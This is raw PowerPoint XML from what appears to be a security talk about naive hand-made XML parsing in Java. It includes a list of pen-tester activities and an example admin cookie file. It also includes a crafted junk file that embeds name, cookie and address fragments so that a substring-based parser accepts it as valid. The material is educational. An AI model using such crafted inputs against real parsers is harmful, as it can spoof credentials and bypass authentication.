              <a:srgbClr val="F47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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HandMade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XML “parser”… on Java…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Выноска 1 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6084168" y="2028840"/>
            <a:ext cx="1872208" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val 179124"/>
              <a:gd name="adj4" fmla="val -109291"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7.substring()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155496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0992" y="188640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360040" y="1340768"/>
            <a:ext cx="8820472" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie.xml:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" cookie=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dsecrg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" address=“10.10.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000"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29</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="2204864"/>
            <a:ext cx="6336704" cy="1008112"/>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7010728" y="2492896"/>
            <a:ext cx="657616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Valid</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Группа 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="323528" y="3429000"/>
            <a:ext cx="6408712" cy="1600438"/>
            <a:chOff x="323528" y="3429000"/>
            <a:chExt cx="6408712" cy="1600438"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323528" y="3429000"/>
              <a:ext cx="5615448" cy="1292662"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>cookie2.xml.trash:</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>There is a good &lt;user xml file</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ndname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>admin”willbefound</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>cookie=“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>dsecrg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>” </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>a</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ndaddress</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=“10.10.0.1”hooray</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>! &gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>and blah-blah-blah</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Прямоугольник 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="384156" y="3771620"/>
              <a:ext cx="6348084" cy="1257818"/>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4" name="Прямоугольник 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384156" y="3771620"/>
            <a:ext cx="6348084" cy="1257818"/>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385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17984"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What do pen-testers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1772816"/>
            <a:ext cx="8229600" cy="4325112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fingerprinting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Banner grabbing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Play with passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Escalate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dig in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find ways to make attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e.t.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="3501008"/>
            <a:ext cx="2520280" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="4127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9539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0992" y="188640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360040" y="1340768"/>
            <a:ext cx="8820472" cy="4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookie.xml:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" cookie=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dsecrg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" address=“10.10.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000"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30</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="2204864"/>
            <a:ext cx="6336704" cy="1008112"/>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7010728" y="2492896"/>
            <a:ext cx="657616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Valid</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Группа 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="323528" y="3429000"/>
            <a:ext cx="6408712" cy="1600438"/>
            <a:chOff x="323528" y="3429000"/>
            <a:chExt cx="6408712" cy="1600438"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323528" y="3429000"/>
              <a:ext cx="5745291" cy="1292662"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>cookie2.xml.trash:</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>There is a good </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;user </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>xml file</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
                <a:t>!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ndname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>admin”willbefound</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>cookie=“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>dsecrg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>” </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>a</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ndaddress</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>=“10.10.0.1”hooray</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>! </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>and blah-blah-blah</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Прямоугольник 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="384156" y="3771620"/>
              <a:ext cx="6348084" cy="1257818"/>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4" name="Прямоугольник 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384156" y="3771620"/>
            <a:ext cx="6348084" cy="1257818"/>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95747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0992" y="188640"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
